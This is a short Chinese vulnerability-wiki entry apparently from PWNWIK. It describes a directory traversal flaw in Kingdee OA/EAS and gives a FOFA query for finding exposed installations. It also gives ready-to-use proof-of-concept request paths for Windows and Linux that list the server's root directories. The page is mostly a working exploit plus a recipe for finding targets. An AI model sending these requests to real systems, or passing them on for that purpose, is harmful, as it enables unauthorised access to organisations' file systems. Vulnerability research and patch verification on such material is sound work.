Loading
0

金蝶OA server file 目录遍历漏洞/zh-cn

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

漏洞影响

金蝶OA

FOFA

app="Kingdee-EAS"

POC

Windows

appmonitor/protected/selector/server_file/files?folder=C://&suffix=

Linux

appmonitor/protected/selector/server_file/files?folder=/&suffix=

免费、自由、人人可编辑的漏洞库